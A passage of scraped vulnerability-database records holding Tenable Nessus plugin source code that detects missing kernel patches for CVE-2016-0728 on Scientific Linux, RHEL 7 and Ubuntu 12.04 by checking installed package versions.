Important)\n\nThe system must be rebooted for this update to take effect.\"\n );\n # https://listserv.fnal.gov/scripts/wa.exe?A2=ind1601&L=scientific-linux-errata&F=&S=&P=11419\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?3869eafb\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fermilab:scientific_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"x-cpe:/o:fermilab:scientific_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Scientific Linux Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Scientific Linux \" >!< release) audit(AUDIT_HOST_NOT, \"running Scientific Linux\");\nos_ver = pregmatch(pattern: \"Scientific Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Scientific Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Scientific Linux 7.x\", \"Scientific Linux \" + os_ver);\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Scientific Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\nif (rpm_check(release:\"SL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-01T05:06:07", "description": "Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.", "edition": 29, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-26T00:00:00", "title": "RHEL 7 : kernel (RHSA-2016:0064)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2021-01-02T00:00:00", "cpe": ["p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists", "cpe:/o:redhat:enterprise_linux:7.4", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64", "p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel", "cpe:/o:redhat:enterprise_linux:7.7", "p-cpe:/a:redhat:enterprise_linux:kernel-devel", "p-cpe:/a:redhat:enterprise_linux:kernel-debug", "cpe:/o:redhat:enterprise_linux:7.5", "p-cpe:/a:redhat:enterprise_linux:kernel-headers", "cpe:/o:redhat:enterprise_linux:7", "p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo", "p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs", "p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel", "p-cpe:/a:redhat:enterprise_linux:perf-debuginfo", "cpe:/o:redhat:enterprise_linux:7.3", "p-cpe:/a:redhat:enterprise_linux:kernel-tools", "p-cpe:/a:redhat:enterprise_linux:kernel", "cpe:/o:redhat:enterprise_linux:7.2", "cpe:/o:redhat:enterprise_linux:7.6", "p-cpe:/a:redhat:enterprise_linux:python-perf", "p-cpe:/a:redhat:enterprise_linux:perf", "p-cpe:/a:redhat:enterprise_linux:kernel-doc"], "id": "REDHAT-RHSA-2016-0064.NASL", "href": "https://www.tenable.com/plugins/nessus/88173", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2016:0064. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(88173);\n script_version(\"2.16\");\n script_cvs_date(\"Date: 2019/10/24 15:35:41\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"RHSA\", value:\"2016:0064\");\n\n script_name(english:\"RHEL 7 : kernel (RHSA-2016:0064)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated kernel packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe kernel packages contain the Linux kernel, the core of any Linux\noperating system.\n\n* A use-after-free flaw was found in the way the Linux kernel's key\nmanagement subsystem handled keyring object reference counting in\ncertain error path of the join_session_keyring() function. A local,\nunprivileged user could use this flaw to escalate their privileges on\nthe system. (CVE-2016-0728, Important)\n\nRed Hat would like to thank the Perception Point research team for\nreporting this issue.\n\nAll kernel users are advised to upgrade to these updated packages,\nwhich contain a backported patch to correct this issue. The system\nmust be rebooted for this update to take effect.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2016:0064\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2016-0728\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-abi-whitelists\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debug-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-s390x\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-debuginfo-common-x86_64\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-headers\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-kdump-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:kernel-tools-libs-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:python-perf-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.4\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:7.7\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/26\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\ninclude(\"ksplice.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = pregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^7([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 7.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2016-0728\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for RHSA-2016:0064\");\n }\n else\n {\n __rpm_report = ksplice_reporting_text();\n }\n}\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2016:0064\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-abi-whitelists-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debug-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-debuginfo-common-s390x-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-debuginfo-common-x86_64-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", reference:\"kernel-doc-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-headers-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"kernel-kdump-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"kernel-tools-libs-devel-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"s390x\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n if (rpm_check(release:\"RHEL7\", cpu:\"x86_64\", reference:\"python-perf-debuginfo-3.10.0-327.4.5.el7\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel / kernel-abi-whitelists / kernel-debug / etc\");\n }\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:29:21", "description": "Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 25, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-01-20T00:00:00", "title": "Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2016-0728"], "modified": "2016-01-20T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2870-2.NASL", "href": "https://www.tenable.com/plugins/nessus/88011", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2870-2. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(88011);\n script_version(\"2.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2016-0728\");\n script_xref(name:\"USN\", value:\"2870-2\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux-lts-trusty vulnerability (USN-2870-2)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Yevgeny Pats discovered that the session keyring implementation in the\nLinux kernel did not properly reference count when joining an existing\nsession keyring. A local attacker could use this to cause a denial of\nservice (system crash) or possibly execute arbitrary code with\nadministrative privileges.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2870-2/\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Update the affected linux-image-3.13-generic and / or\nlinux-image-3.13-generic-lpae packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.13-generic-lpae\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2016/02/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2016/01/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/01/20\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2016-2020 Canonical, Inc. / NASL script (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = 